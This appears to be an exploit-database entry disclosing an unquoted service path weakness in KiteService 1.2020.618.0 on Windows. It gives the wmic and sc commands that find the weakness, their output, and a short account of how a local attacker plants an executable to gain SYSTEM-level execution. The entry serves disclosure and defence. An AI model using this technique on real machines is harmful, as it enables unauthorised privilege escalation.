[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KiteService 1.2020.618.0 - Unquoted Service Path Vulnerability

Author
Marcos Antonio León
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-34615
Category
local exploits
Date add
26-06-2020
Platform
windows
# Exploit Title: KiteService 1.2020.618.0 - Unquoted Service Path
# Discovery by: PoisonSk
# Vendor Homepage: https://www.kite.com/
# Software Link : https://www.kite.com/download/
# Tested Version: 1.2020.618.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home Single 10.0.18363 N/D Compilación 18363



# Steps to discover unquoted Service Path: 

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i "program " | findstr /i /v """
KiteService	KiteService	C:\Program Files\Kite\KiteService.exe	Auto




C:\Users>sc qc KiteService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: KiteService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : KiteService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem



# Exploit:
#A successful attempt would require the local attacker must insert an executable file in the path of the service. 
#Upon service restart or system reboot, the malicious code will be run with elevated privileges.

#  0day.today [2024-11-16]  #